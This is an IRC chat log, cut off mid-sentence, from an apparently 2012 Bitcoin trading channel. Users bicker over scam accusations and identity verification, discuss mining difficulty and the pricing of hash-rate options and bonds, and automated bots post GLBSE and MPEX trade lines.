more potential recompense for validated people, nbut with the volume of most BTC transactions you're not going to go and sue anyone if they go shits up Aug 13 04:43:47 tsukino yes they are! in general they're clever and daring sorts, except the kids are insufficiently trained Aug 13 04:43:50 s/nbut/but Aug 13 04:43:51 I dont think its fair that you insinuated that romanians were scammers esp. since you are romanian Aug 13 04:43:55 so they end up making fools of themselves on teh interwebz. Aug 13 04:43:56 mircea_popescu: Pseudonymous is good Aug 13 04:44:16 i insinuated that ?! Aug 13 04:44:27 I know, I'm agreeing Aug 13 04:44:31 You said something about romanian scammers and said ban the whole c-class lol Aug 13 04:44:41 well romania has more than one c class lol Aug 13 04:44:52 I just get annoyed at people Q_Qing about 'omg hidden whois' like it means anything Aug 13 04:44:53 >c class Aug 13 04:44:53 Wow since when Aug 13 04:44:57 >class Aug 13 04:44:59 ahahah Aug 13 04:44:59 Lol Aug 13 04:45:01 ciuciu: what precautions do you suggest? Aug 13 04:45:05 >/facepalm Aug 13 04:45:35 but srsly! the reason i publish mpoe/mpex monthly in romanian is exactly that, get people to see that yes, romania is like the 3rd economy of the eu Aug 13 04:45:42 now that franceitalyspainportugalirelandetc went bust. Aug 13 04:46:09 Romania is great Aug 13 04:46:14 Cheap alcohol Aug 13 04:46:18 Luceo, most scammers don't want to be known, even if they steal only small amounts Aug 13 04:46:24 ciuciu: you really think an id would help anything? Aug 13 04:46:40 BTC-Mining: Sure, but a lot of non-scammers don't want to be known either Aug 13 04:46:42 what id dood ? Aug 13 04:46:58 BTC-Mining: Take SR traders for example, they may not wish to be known :P Aug 13 04:47:03 But many are not scammers Aug 13 04:47:27 imo selling pot for like, > 10 bux an ounce is Aug 13 04:47:28 I suppose then not knowing who you're dealing with can be acceptable, and knowing is a small bonus Aug 13 04:47:32 mircea_popescu: this ciuciu person want's your id Aug 13 04:47:33 costs what to grow, bout the same as hay ? Aug 13 04:47:43 smickles is it so hard to google my name ?! Aug 13 04:47:46 mircea_popescu: Blame the government :( Aug 13 04:48:06 Luceo just saying, on the face of things prolly cheaper to feed horses pot than hay. Aug 13 04:48:15 certainly a lot more fun riding them afterwards lol Aug 13 04:48:25 Quite probably, but a lot worse to get caught with pot than hay :P Aug 13 04:49:38 mircea_popescu: i would assume he means a form of id which is made of plastic and 'issued to you' Aug 13 04:50:06 right. anonymous dude with scammy glbsse assets (pardon the pleonasm) is asking for my id. Aug 13 04:50:11 what's this, paraipan reloaded ? Aug 13 04:50:17 ciuciu: why would he run with the money, rather than continue operating a successful operation? Aug 13 04:50:47 ciuciu issues assets on glbse? Aug 13 04:51:18 his entire issue is that the girl pointed out that his bond's name, aka ciuciu Aug 13 04:51:24 means "jack shit" in romanian. which it does. Aug 13 04:51:27 mircea_popescu: wasn't paraipan the guy who filed a police report on sombody? Aug 13 04:51:36 it was zhou, for not giving him id or somesuch. Aug 13 04:52:26 how dares zhou operate a business and not give paraipan his id!!11 Aug 13 04:52:33 ciuciu: glbse verification means jack shit Aug 13 04:52:37 What is your glbse asset ciuciu? Aug 13 04:52:42 it could be so easily faked Aug 13 04:52:57 did you even verify in the end smickles ? Aug 13 04:53:03 ciuciu: i post my own garbage on glbse, thank you Aug 13 04:53:06 i remember at some point a riot in -otc Aug 13 04:53:09 mircea_popescu ya Aug 13 04:53:22 Seems it would be hard to fake GLBSE verification if extra steps were taken Aug 13 04:53:40 mircea_popescu: yeah, the 'riot' was just because of the way nefario presented things Aug 13 04:53:43 the entire notion of allowing anyone to selfserve ipo is sordid. Aug 13 04:53:44 Like actually mailing the claimed address Aug 13 04:53:51 with a code Aug 13 04:53:52 it seems to have 'all worked out in the end' Aug 13 04:54:05 there's no fixing that. so you verify a name and an address. so ? Aug 13 04:54:11 [GLBSE] [FPGAMINING] 1 @ 0.869 BTC [+] Aug 13 04:54:13 [GLBSE] [FPGAMINING] 1 @ 0.879 BTC [+] Aug 13 04:54:14 [GLBSE] [FPGAMINING] 4 @ 0.929 = 3.716 BTC [+] Aug 13 04:54:15 [GLBSE] [FPGAMINING] 14 @ 0.95 = 13.3 BTC [+] Aug 13 04:54:37 irl banking & finance has > 500 years of history, to this day it's not reached this pinnacle of grandeur where you self-ipo. Aug 13 04:54:44 there;'s a frigging reason. it's called vetting. Aug 13 04:54:56 mircea_popescu: yeah, plenty of details Aug 13 04:55:17 You never know how close some investors are, especially in an open market for issuing... Aug 13 04:55:27 dude srsly. you do what ? Aug 13 04:55:34 you drive to the guy's door and ? beat him up ? Aug 13 04:55:39 That's the "so" Aug 13 04:55:40 get sued for it, sell your house ? Aug 13 04:55:41 Why does that mean anything? o.O Aug 13 04:56:07 ciuciu: Why does it matter where he lives? idgi Aug 13 04:56:08 People tend to be fond of their reputation Aug 13 04:56:19 so what, you sit on his porch and scream ? Aug 13 04:56:34 these aren't, if maturely considered, solutions. Aug 13 04:56:36 I can drive to Romania, Canada is ~$1400 flights Aug 13 04:56:44 Who am I more likely to be able to sue? :P Aug 13 04:56:59 Neither, probably. Aug 13 04:57:11 Suing over Bitcoins is totally untested in courts Aug 13 04:57:11 geez, i'm in NC and had to sue someone in MO Aug 13 04:57:11 i can sue anyone and everyone. in general once you reach this point you realise how darn few people / corps its worth your time to sue. Aug 13 04:57:13 srsly. Aug 13 04:57:17 even that blew ass Aug 13 04:57:25 GLBSE auth issues? Aug 13 04:57:25 mircea_popescu: That. Aug 13 04:57:34 You could just go beat him up out of nowhere and leave, although it carries risk... Aug 13 04:57:46 BTC-Mining who pays for your labour as a thug ? Aug 13 04:57:54 I don't think validating who anyone is means anything, yeah I can sue him but likely my volume isn't going to be enough to justify it Aug 13 04:57:55 if you manage to get away that's like 1k an hour sort of rates. Aug 13 04:58:12 mircea_popescu: Speaking from experience? :P Aug 13 04:58:25 no, from knowledge. Aug 13 04:58:29 Luceo: and, you could sue and win, and still get no money Aug 13 04:58:36 smickles: Exactly Aug 13 04:58:45 actually i read but don't recall where that the MAJORITY of suits don't make more money than the cost to sue. Aug 13 04:58:54 which bears out in the experience. Aug 13 04:59:14 I've only sued one person, and he settled out of court Aug 13 04:59:23 Ah, fine, consider it whichever way you want Aug 13 04:59:28 ciuciu: if you only do business with people you can meet, you are severely limiting your potential Aug 13 04:59:46 he has no potential. Aug 13 04:59:54 Luceo: lucky you. I, otoh, had to deal with the scum of the earth Aug 13 04:59:57 Luceo: I have an aunt called Sue, we generally say it's a description rather than a name :P Aug 13 05:00:04 hahaha Aug 13 05:00:06 smickles: :( Aug 13 05:00:17 Azelphur: lol I have an aunt called Sue, and likewise >_> Aug 13 05:00:21 haha Aug 13 05:00:22 o wait, were those your tenants that ruined your place smickles ? Aug 13 05:00:29 But she was a lawyer :P Aug 13 05:00:51 well, honestly, i sued the romanian interior ministry and forced them to friggin change the laws Aug 13 05:00:53 haha, my aunt just phones up and shouts at people and cites the multiple ways in which she's going to sue them until she gets her way Aug 13 05:00:53 xD Aug 13 05:01:07 oh lol, my aunt was a corporate lawyer :P Aug 13 05:01:11 [MPEX] [S.MPOE] 50046 @ 0.00037911 = 18.9729 BTC [-] Aug 13 05:01:12 And her husband was a banker lol Aug 13 05:01:13 it wasn't easy nor cheap, but in the end worth it. nevertheless, i tell you, litigations of the nature discussed here are rarely worth it. Aug 13 05:01:23 mircea_popescu: yup, those people Aug 13 05:01:24 haha Aug 13 05:01:55 ciuciu: what a coincidence, i too manage over 1000btc of others Aug 13 05:02:01 er Aug 13 05:02:04 2000 Aug 13 05:02:04 at least nao lol Aug 13 05:02:12 I manage very little of others' money! :D Aug 13 05:02:22 And I'm glad for it Aug 13 05:02:25 smickles: and like 1/4 of that is mine, haha Aug 13 05:02:27 jsut your aunt sue's right ? Aug 13 05:02:31 2000? Not bad Aug 13 05:02:46 o you got dough in mpoe.etf Azelphur ? Aug 13 05:02:52 and i'm glad to have your confidence Azelphur Aug 13 05:02:53 mircea_popescu: SS Aug 13 05:02:57 :D Aug 13 05:02:58 a a Aug 13 05:03:09 ya, how;s that going ? haven't seen the other s guy in a while Aug 13 05:03:19 I wonder if I should manage a fund. Aug 13 05:03:24 it's just kinda quietly ticking over really Aug 13 05:03:33 it's weird all the hype has died down Aug 13 05:03:34 was a sort of arb bot right ? Aug 13 05:03:34 I think a mining operation is sufficient. Aug 13 05:03:38 but it's still performing exactly as they said it was Aug 13 05:03:39 or was that with shakurur ? Aug 13 05:03:44 SS? nah it's spread out deposits with banks Aug 13 05:03:49 with a small insurance Aug 13 05:03:49 BTC-Mining mining is dead louise. Aug 13 05:03:53 ciuciu: i was just pointing out a coincidence :/ Aug 13 05:04:07 Mining ain't dead Aug 13 05:04:08 ciuciu: you really haven't said anything except quoting a particularly retarded mod on a wholey retarded forum Aug 13 05:04:12 fixed rate bonds are dead Aug 13 05:04:22 hmm mebbe. Aug 13 05:04:42 ciuciu: which only serves to make you look kinda retarded yourself Aug 13 05:04:42 re the forum, has anyone thought about forking it? Aug 13 05:04:49 o god. Aug 13 05:04:54 if someone would make a decent forum... Aug 13 05:05:04 there was one guy who was thinking of doing it, but it seems a bit, well...terrible Aug 13 05:05:05 I'll make a decent forum Aug 13 05:05:05 Which forum? Aug 13 05:05:06 ONE DAY Aug 13 05:05:08 >_> Aug 13 05:05:10 Ciuciu no offense but psy is a troll Aug 13 05:05:12 no conditions to be able to joi, but instaban for being dumb. Aug 13 05:05:15 What would be counted as decent? Aug 13 05:05:18 ^^ Aug 13 05:05:25 Psy attacks anyone and anything including me Aug 13 05:05:28 for next to no reason Aug 13 05:05:36 Psy must like me Aug 13 05:05:40 And you're new here too, aren't you? I mean you just came here last month? Aug 13 05:05:42 idk, he hasnt attacked me yet Aug 13 05:05:42 psy managed to get on irc ?! Aug 13 05:05:44 Luceo: the people who run it really make a forum what it is, have a set of clearly laid out guidelines Aug 13 05:05:47 Maybe you should hold off on the scammer accusations Aug 13 05:06:15 So post the link Aug 13 05:06:27 Luceo: there was a guy who was messaging me the other day he made a forum, he keeps spamming everywhere with it, and he made luke a mod Aug 13 05:06:38 lol Aug 13 05:06:40 lol Aug 13 05:06:46 Its cool I'll make RS a mod Aug 13 05:06:54 luke is gonna sell his btc for $25 soon and you'll all be sorry. Aug 13 05:07:13 mircea_popescu: and then donate it all to the church :P Aug 13 05:07:17 Azelphur: I've fallen in love with OpenBSD Aug 13 05:07:21 straight to the pope baby. Aug 13 05:07:22 >_< Aug 13 05:07:22 Luceo: :D Aug 13 05:07:31 This OS is just perfect :P Aug 13 05:07:33 Ok, and now everybody knows. We can all go check it out. Aug 13 05:07:36 Thanks ciuciu. Aug 13 05:07:41 It's a matter of public record now. Aug 13 05:07:47 Azelphur why do you steal people from debian you zealot! Aug 13 05:08:01 Permission not to care >_< Aug 13 05:08:04 Mircea: Serious question. This link has the word DEFAULT in it. http://www.enom.com/whois/default.aspx?DomainName=PoliMedia.us Aug 13 05:08:04 mircea_popescu: wat Aug 13 05:08:08 Have you DEFAULTED on anything recently? Aug 13 05:08:09 mircea_popescu: Azelphur didn't steal me :P Aug 13 05:08:16 lmao Aug 13 05:08:19 indeed xD Aug 13 05:08:21 Because if you have.... Aug 13 05:08:25 You are in big trouble! Aug 13 05:08:26 polimedia (srl) is in fact my company. Aug 13 05:08:28 I don't even use bsd, I'm a Ubuntu person Aug 13 05:08:36 Seriously though, how does this make mircea a scammer? Aug 13 05:08:38 the tax # is 22530016 and it's operating today as the first day. Aug 13 05:08:39 I don't get it Aug 13 05:08:39 mircea_popescu: can I call you Martha in future Aug 13 05:08:43 www.enom.com/whois/default.aspx?DomainName=fennec.name Like srsly I must be a scammer -_- Aug 13 05:08:46 no, that's my cto. Aug 13 05:08:58 It's just a domain name reg Aug 13 05:08:59 :( Aug 13 05:09:04 you can call her martha tho. Aug 13 05:09:13 Look, if you go hunting on me you will discover I have registered domains in the name of cartoon characters Aug 13 05:09:20 usagi: Me too Aug 13 05:09:23 That doesn't make me a scammer, it makes me anonymous. Aug 13 05:09:32 MtGox want me to prove my name is Miles 'Tails' Prower :( Aug 13 05:09:34 no but srsly. the woman is my cto, it's her darned job to register domains wtf. Aug 13 05:09:39 They don't believe me Aug 13 05:09:48 I have a few in the names of characters in science fiction books Aug 13 05:10:01 usagi, you crack me up. now i have a backlog of lines to read in this channel Aug 13 05:10:30 this chan actually is very sprightly of late. Aug 13 05:10:41 And idk what I'm going to do when StartSSL asks me to prove I'm Kim Jong-il, I mean he fucking died >_< Aug 13 05:11:07 ciuciu do you have any evidence aside from the dns info? Aug 13 05:11:40 mircea_popescu: if polimedia is, as you state, your company. then surely you can show me a pic of the company's logo/name on a bumpersticker which is itself on a pair of tits Aug 13 05:12:02 ^ And ugly tits don't count Aug 13 05:12:08 it's weird all the hype has died down << you know i think there's a forum rule that only crappy investments can have hype. Aug 13 05:12:18 haha Aug 13 05:12:22 lmao... Aug 13 05:12:23 Send it to me, I can get someone to translate from Romanian Aug 13 05:12:27 i could send you the pic on tits i think. Aug 13 05:12:31 SS just basically sits there quietly, continually putting out and performing within expected parameters Aug 13 05:12:44 o wait. Aug 13 05:12:47 you saw that pic didn't you. Aug 13 05:12:57 the terrifying one of you? Aug 13 05:12:58 :) Aug 13 05:13:02 lmao Aug 13 05:13:11 no, some pic of a juicy pair of tits Aug 13 05:13:15 The one on the bitvps photo book? Aug 13 05:13:20 nono Aug 13 05:13:47 Is this a really complex form of Aug 13 05:13:51 'tits or gtfo'? Aug 13 05:14:01 lol wtf where did i put it. Aug 13 05:14:37 i probably have it in archive somewhere /me starts lookin' Aug 13 05:14:40 ahaha guise! Aug 13 05:14:47 google poliboobs.jpg in images. Aug 13 05:15:08 [MPEX] [S.MPOE] 4154 @ 0.00037911 = 1.5748 BTC [-] Aug 13 05:15:08 [MPEX] [S.MPOE] 5865 @ 0.00038561 = 2.2616 BTC [+] Aug 13 05:15:20 lol Aug 13 05:15:29 that's one way to advertise Aug 13 05:15:30 xD Aug 13 05:15:33 :D Aug 13 05:15:42 i intend to do a party, have all the girls politopless. Aug 13 05:15:50 AND NONE OF YOU CAN COME. Aug 13 05:15:52 /r/ invite Aug 13 05:15:54 zomg :o Aug 13 05:15:57 lol Aug 13 05:16:13 Who cares about ID? Aug 13 05:16:30 idc if his name's John Smith, and he lives in China Aug 13 05:16:38 -_- Aug 13 05:16:47 ;;getrating mircea_popescu Aug 13 05:16:47 WARNING: Currently not authenticated. User mircea_popescu, rated since Fri Jul 22 08:04:26 2011. Cumulative rating 76, from 37 total ratings. Received ratings: 36 positive, 1 negative. Sent ratings: 40 positive, 2 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=mircea_popescu Aug 13 05:16:54 ^ Worth more than ID Aug 13 05:16:59 agree Aug 13 05:16:59 wait, the plot thickens. i think maybe it's an impostor ? Aug 13 05:17:15 ;;gpg info mircea_popescu Aug 13 05:17:16 User 'mircea_popescu', with keyid 8A736F0E2FB7B452, fingerprint 6160E1CAC8A3C52966FD76998A736F0E2FB7B452, and bitcoin address None, registered on Fri Jul 22 05:39:10 2011. http://bitcoin-otc.com/viewgpg.php?nick=mircea_popescu . Currently not authenticated. Aug 13 05:17:22 oh...new negative...indeed Aug 13 05:17:39 Does he? Aug 13 05:17:46 sadly the otc has one flaw Aug 13 05:17:49 [GLBSE] [PUREMINING] 2 @ 0.15439999 = 0.3088 BTC [+] Aug 13 05:18:00 noobs like rg that do 10000 five bucks trades are rated +500 Aug 13 05:18:13 and whales like me that do > 10k per trade are like, 11. Aug 13 05:18:24 Daniel Folkinshteyn? relly? Aug 13 05:18:30 [GLBSE] [NYAN.C] 400 @ 1 = 400 BTC [+] Aug 13 05:18:41 what about nano ? Aug 13 05:19:20 mircea_popescu: The flaw is that stupid people don't read the descriptions of the trades :P Aug 13 05:19:26 [GLBSE] [RAREEARTH] 1 @ 0.009201 BTC [-] Aug 13 05:19:28 [GLBSE] [RAREEARTH] 2 @ 0.00915 = 0.0183 BTC [-] Aug 13 05:19:29 [GLBSE] [RAREEARTH] 445 @ 0.0091 = 4.0495 BTC [-] Aug 13 05:19:48 as any perfect system , the wot is only as good as the tech using it Aug 13 05:19:52 much akin linux. Aug 13 05:20:01 No system is perfect Aug 13 05:20:18 [GLBSE] [YABMC] 6 @ 0.1239 = 0.7434 BTC [-] Aug 13 05:20:23 don't be a hater :D Aug 13 05:21:09 [GLBSE] [NYAN.B] 200 @ 1 = 200 BTC [-] Aug 13 05:22:40 [GLBSE] [TYGRR.BOND-P] 2 @ 1.0389 = 2.0778 BTC [-] Aug 13 05:22:46 usagi: I lol every time I see that asset name >_> Aug 13 05:23:20 [MPEX] [S.MPOE] 3881 @ 0.00039395 = 1.5289 BTC [+] Aug 13 05:23:22 [MPEX] [S.MPOE] 6199 @ 0.00036805 = 2.2815 BTC [-] Aug 13 05:23:23 [MPEX] [S.MPOE] 17359 @ 0.00036632 = 6.3589 BTC [-] Aug 13 05:23:24 [MPEX] [S.MPOE] 60500 @ 0.00036497 = 22.0807 BTC [-] Aug 13 05:23:25 [MPEX] [S.MPOE] 2061 @ 0.000335 = 0.6904 BTC [-] Aug 13 05:23:45 [GLBSE] [TYGRR.BOND-P] 2 @ 1.039 = 2.078 BTC [+] Aug 13 05:24:08 [GLBSE] [YABMC] 1 @ 0.1239 BTC [-] Aug 13 05:26:16 mircea_popescu: most of my trades are over $100 Aug 13 05:26:20 :D Aug 13 05:26:23 how you doin' rg ? Aug 13 05:26:27 one person buys my lunch every day Aug 13 05:26:32 and hes had the same rating from me Aug 13 05:26:33 for ages Aug 13 05:26:41 i was just being an ass omg! Aug 13 05:27:03 is it just me, or is this an insanely good buy? Aug 13 05:27:06 http://polimedia.us/bitcoin/mpex.php?mpsic=O.HASH.P10TH Aug 13 05:27:29 its not th/s Aug 13 05:27:54 alright, maybe not 'insanely good' Aug 13 05:28:18 i forget the formula that turns hash into money Aug 13 05:28:28 [GLBSE] [OBSI.HRPT] 1 @ 0.1048 BTC [+] Aug 13 05:29:56 but still, it's like where you bot prices at is right at where the projected diffToBTC rate come out at, and we're in a strong uptrend on the difficulty Aug 13 05:30:21 it's not my bot, it's a 3rd party. Aug 13 05:30:25 orly Aug 13 05:30:27 ((bReward * firstDiffTime * MhBond * 10^6)/((firstDiff * 2^32)))+((bReward * secondDiffTime * MhBond * 10^6)/((secondDiff * 2^32))) Aug 13 05:30:33 lettuce see Aug 13 05:30:55 What name Luceo? TYGRR PEE? Aug 13 05:31:15 .py ((50 * 10000000000000)/((2190866 * 2^32))) Aug 13 05:31:17 114110961 Aug 13 05:31:17 How about THUNDERCM.MIF.SHARES Aug 13 05:31:28 Or BITCOIN-ASS or whatever it's called Aug 13 05:31:30 seems about right no ? Aug 13 05:32:04 i mean Aug 13 05:32:23 Every time I see TYGRR.BOND-PI I think of Magnum P.I. Aug 13 05:33:42 .py (50 * 10^12)/(2190866 * 2^32) Aug 13 05:33:43 0 Aug 13 05:33:49 .py (50 * 10^12)/(2190866.0 * 2^32) Aug 13 05:33:50 TypeError: unsupported operand type(s) for ^: 'float' and 'int' Aug 13 05:33:56 ** Aug 13 05:33:58 right? Aug 13 05:33:59 .py 1.0*(50 * 10^12)/(2190866 * 2^32) Aug 13 05:34:01 0.000115023849191 Aug 13 05:34:10 mmm py is rounding badly. Aug 13 05:34:16 i got 0.005313667 Aug 13 05:34:18 [GLBSE] [CIUCIU.BOND] 1 @ 0.099 BTC [-] Aug 13 05:34:48 so the bot seems to think the diff will up a lot. Aug 13 05:34:50 i guess ? Aug 13 05:34:51 [GLBSE] [NYAN.C] 1 @ 1 BTC [+] Aug 13 05:35:19 mircea_popescu: hmm, i think i used a different method to value it or something Aug 13 05:35:25 lemme check my notes Aug 13 05:35:32 but i mean it's block * hashes by diff times 2^32 no ? Aug 13 05:35:50 << kinda noob in mining. Aug 13 05:36:33 o no wait! the value is like 0.005. and the option says : Aug 13 05:36:34 What this means is that the holder of one option has the right (but not the obligation) to sell 10 Th (that's ten thousand billion hashes, or approximately 2.77 Gh/s running for one hour) for 0.075 BTC Aug 13 05:37:03 so if you sell for 0.075 something worth 0.005 then the sale itself should be worth 0.07 Aug 13 05:37:25 [MPEX] [F.GIGA.ETF] 14549 @ 0.00113771 = 16.5525 BTC [-] Aug 13 05:37:54 hmm Aug 13 05:38:33 mnono! it's 10th so 10^13! Aug 13 05:38:56 thus, the insta value is like .05 and the value is .075 so naturally the bot values around .025 Aug 13 05:39:18 [GLBSE] [STANDARD.5.50] 1000 @ 0.0001 = 0.1 BTC [+] Aug 13 05:40:05 mircea_popescu: there we are. but my point is, given the current ust/btc price history, the amount of hashes on the network has yet to catch up Aug 13 05:40:18 s/current/recent/ Aug 13 05:40:45 so... the diff rate will likely only go higher Aug 13 05:41:00 well possibly Aug 13 05:41:04 so, the value of a hash will likely only go lower Aug 13 05:41:20 mno Aug 13 05:41:21 Difficulty 2190866 Aug 13 05:41:21 Estimated 2191980 in 1926 blks Aug 13 05:41:31 see, i think 1,9k blocks is past the option expiry. Aug 13 05:41:37 how many days is 1926 blocks ? Aug 13 05:41:44 .py 1926 / 6 / 24 Aug 13 05:41:45 13 Aug 13 05:41:54 mno. well i dunno wtf. Aug 13 05:42:00 oh well, i bought it much earlier at a much lower price anywoy Aug 13 05:42:01 ;D Aug 13 05:42:05 :p Aug 13 05:42:26 was it priced lower earlier !? Aug 13 05:42:45 on the graph price seems to have mostly been falling Aug 13 05:42:58 mircea_popescu: as low as 0.00861487 Aug 13 05:43:10 mmm was that last month ? Aug 13 05:43:22 must have been, however Aug 13 05:43:35 it wasn't much higher at the beginning of this month Aug 13 05:43:36 well ya, but these are options you see. Aug 13 05:43:45 i think it musta been. Aug 13 05:44:02 you sure you didn't get C ? Aug 13 05:44:22 O.HASH.P10TH x 100 Aug 13 05:44:46 not many, but i'm a small fry Aug 13 05:44:56 and this was my firs buy on those things Aug 13 05:45:08 ;;ident smickles Aug 13 05:45:09 Nick 'smickles', with hostmask 'smickles!~smickles@184.154.30.40', is not identified. Aug 13 05:45:53 [GLBSE] [YARR] 3 @ 1.59 = 4.77 BTC [+] Aug 13 05:45:54 well, maybe they were cheaper earlier i dunno. Aug 13 05:45:54 ah, this is what i get for bragging to the guy who runs the system Aug 13 05:46:06 lol what did you get ? Aug 13 05:46:23 heh, i thought you were checking up on me Aug 13 05:47:10 i dunno, it doesn't make sense. it's the weekend, and i drink on the weekend Aug 13 05:47:22 diff before was 2036671.08869332 Aug 13 05:47:26 [GLBSE] [NYAN] 1 @ 0.99 BTC [-] Aug 13 05:47:27 so ya, it jumped you made monyz. Aug 13 05:47:39 its how they werk. Aug 13 05:48:07 [GLBSE] [PUREASIC] 2 @ 0.7 = 1.4 BTC [+] Aug 13 05:48:11 heh, yeah, i was confident that i'd make monyz when i made the buy Aug 13 05:48:41 i meant, i thought you were looking up in you database to verify when and at what price i bought them at Aug 13 05:48:48 o Aug 13 05:48:56 haha i dun really care. Aug 13 05:49:20 [GLBSE] [BBBB] 130 @ 0.00027 = 0.0351 BTC [+] Aug 13 05:49:35 yeah, 2 glasses of wine will make me think the whole world revolves around my thoughts Aug 13 05:49:40 lol Aug 13 05:50:23 so did gigavps get his minis/rigs in the end ? Aug 13 05:50:44 He got them a long time ago... Aug 13 05:51:11 Must have been months Aug 13 05:51:30 did he make a nice site for them like Aug 13 05:51:35 http://gigamining.com/mgpumon/ ? Aug 13 05:53:42 No idea actually Aug 13 05:53:50 [GLBSE] [TYGRR.BOND-P] 1 @ 1.039 BTC [+] Aug 13 05:54:20 but ya diff jumped 33% past ~4 months Aug 13 05:54:40 in strict depreciation terms all mining assets that didn't make at least 9% per month are a net loss. Aug 13 05:55:51 Mining equipment is bought in USD &/or other fiat. Aug 13 05:56:18 yeah... Aug 13 05:56:21 i forgot that Aug 13 05:56:40 33% depreciation through diff rate increase and 50% depreciation through btc appreciation Aug 13 05:56:50 Considering that Difficulty is behind the price raise... well you'd have been better off keeping BTC Aug 13 05:56:53 all mining assets that didn't make 20% per month past 3 mionths are a net loss. Aug 13 05:56:58 yup. Aug 13 05:58:12 I meant that by investing in equipment with a fixed USD value, you want returns that can buy you more equipment. Aug 13 05:58:28 and technically, the mining/equipment has raised in USD value Aug 13 05:58:51 Hence why we're undergoing a sudden rapid difficulty growth Aug 13 05:59:20 Still, you'd get more having kept your bitcoins Aug 13 06:01:27 As I see it, if bitcoin prices soars, you'd be better off keeping them (although you still earn more as difficulty adapt). If prices drop, you have too much hashing per price and returns decrease Aug 13 06:01:45 As such, a stable fiat to BTC rate would seem better Aug 13 06:02:07 [GLBSE] [FPGAMINING] 1 @ 0.95 BTC [+] Aug 13 06:02:08 [GLBSE] [FPGAMINING] 4 @ 0.96 = 3.84 BTC [+] Aug 13 06:02:55 [GLBSE] [FPGAMINING] 2 @ 0.96777 = 1.9355 BTC [+] Aug 13 06:02:59 At least ASIC is the last step and large price/hashing changes should be behind us from now on Aug 13 06:03:11 Lowering slowly as ASICs become more performant Aug 13 06:05:42 usagi: That one too :P Aug 13 06:05:49 But mostly your nyan assets :P Aug 13 06:06:09 [GLBSE] [NYAN.C] 2 @ 1.08 = 2.16 BTC [+] Aug 13 06:08:57 [GLBSE] [BITNODES] 1 @ 0.25 BTC [+] Aug 13 06:09:41 BTC-Mining it would, yes. Aug 13 06:12:27 ASICs on 32nm should still be a significant jump Aug 13 06:12:38 or 28nm Aug 13 06:12:46 or maybe even 22nm when that happens. Aug 13 06:13:18 i think they have working prototypes already Aug 13 06:13:42 [GLBSE] [ASICMINER] 50 @ 0.1 = 5 BTC Aug 13 06:15:00 [GLBSE] [BITCOINMINV] 10 @ 0.1200001 = 1.2 BTC [-] Aug 13 06:15:02 [GLBSE] [BITCOINMINV] 19 @ 0.12 = 2.28 BTC [-] Aug 13 06:15:44 [GLBSE] [BITCOINMINV] 10 @ 0.12 = 1.2 BTC [-] Aug 13 06:19:56 https://bitcointalk.org/index.php?topic=100303.0 food for thought. Aug 13 06:20:01 if anyone cares to weigh in. Aug 13 06:20:15 [GLBSE] [GMVT-BOT] 2 @ 0.1 = 0.2 BTC [-] Aug 13 06:21:40 mircea_popescu: https://bitcointalk.org/index.php?topic=98491.40 get your pr lady to point out that it's not 'the best time to sell in a year', it's the best time to buy puts in a year Aug 13 06:22:26 haha ty. Aug 13 06:23:25 i might have cause of name reference Aug 13 06:25:42 nanotube: you were mentioned as not being a thief and a lier, iirc Aug 13 06:26:56 smickles: oh, that's good :) Aug 13 06:27:02 [MPEX] [S.MPOE] 28200 @ 0.00039367 = 11.1015 BTC [+] Aug 13 06:27:04 [MPEX] [S.MPOE] 15700 @ 0.00038343 = 6.0199 BTC [-] Aug 13 06:27:05 [MPEX] [S.MPOE] 16800 @ 0.00037284 = 6.2637 BTC [-] Aug 13 06:27:10 nanotube is just very small Aug 13 06:27:23 how can something that small be a thief ? you'd accidentallty smush it midrobbery Aug 13 06:27:24 someone's buying some s.mpoe eh. Aug 13 06:27:28 haha Aug 13 06:27:34 it's been going back and forth. Aug 13 06:28:41 aww you can't be on 24/7 Aug 13 06:29:00 the order should have been placed and waiting :/ Aug 13 06:29:34 black swan event, keeps money locked up Aug 13 06:30:07 i'll have to ask copumpkin if that 'event' was him cashing out Aug 13 06:32:04 [GLBSE] [TYGRR.BOND-P] 1 @ 1.039 BTC [+] Aug 13 06:32:41 o hehe, is he that rich ? Aug 13 06:34:59 mircea_popescu: probably :P Aug 13 06:35:20 EskimoBob : speaking of the bonds you or i can invest into, afaik the only such in btcworld are the MPOE bonds. care to go through them with me to check this theory ? Aug 13 06:35:35 mircea, for example, gigamining share holders will be able to pay 0.25 BTC to switch their 1 BTC IPO share (5 mhash each) to 4 shares (25 mhash each) for 20x the hashing. Aug 13 06:35:50 when ASICs are out Aug 13 06:36:11 and there is already over 0.30 BTC paid back per share Aug 13 06:36:19 [GLBSE] [BIF.1YR.LOAN] 3 @ 0.98076923 = 2.9423 BTC [-] Aug 13 06:36:37 BTC-Mining still not a bond, sounds more like a sort of stock option ?! Aug 13 06:36:46 Not to count difficulty was relatively stable before bitcoin prices raised Aug 13 06:37:07 yes but as the guy rightly points out, in order for something to be a bond it needs to meet some criteria. Aug 13 06:37:09 [GLBSE] [TYGRR.BOND-P] 2 @ 1.039 = 2.078 BTC [+] Aug 13 06:37:15 these are 1. fixed principal and 2. maturity date. Aug 13 06:37:18 absent either it ain't a bond. Aug 13 06:37:19 Well, he had GPUs, but he bought a lot of FPGA which is tradable for the new ASICs from BFL Aug 13 06:37:30 i think he still has the gpus Aug 13 06:37:39 So for that part, upgrade was already paid by investors Aug 13 06:37:52 yeah, but he'll have to lose them with raising difficulty Aug 13 06:37:59 maybe so. Aug 13 06:38:07 none of this is really germane to the issue tho. Aug 13 06:38:19 if i lend you a car i haven't sold you it, i've lent you it Aug 13 06:38:27 if i tack on the option for you to turn it into an airplane Aug 13 06:38:30 it's still not a sale. Aug 13 06:40:12 [GLBSE] [NYAN.C] 2 @ 1.02 = 2.04 BTC [-] Aug 13 06:40:14 [GLBSE] [NYAN.C] 2 @ 1.01 = 2.02 BTC [-] Aug 13 06:40:15 [GLBSE] [NYAN.C] 1 @ 1.001 BTC [-] Aug 13 06:40:16 [GLBSE] [NYAN.C] 74 @ 1 = 74 BTC [-] Aug 13 06:40:39 Well yes and no. It's technically a sale of power, but the equipment is managed by Gigavps who has a margin vs what he gets with what people paid. Aug 13 06:40:50 ... Aug 13 06:41:04 but he makes no representation he will return a certain btc value at a certain future date. Aug 13 06:41:27 He could do it that way: I've sold you a contract for X mhash. Equipment remains mine, and I'll trade it for 20x more mhash, but won't give you anything Aug 13 06:42:01 Or he could go: Well you did pay for the equipment I'm trading in. I'll raise to Y mhash on those contracts and keep a similar margin Aug 13 06:42:08 yes, it could be a bond in the very tenuous theory where hash power is a currency Aug 13 06:42:14 except i don't think it is. Aug 13 06:42:38 It is a bond, 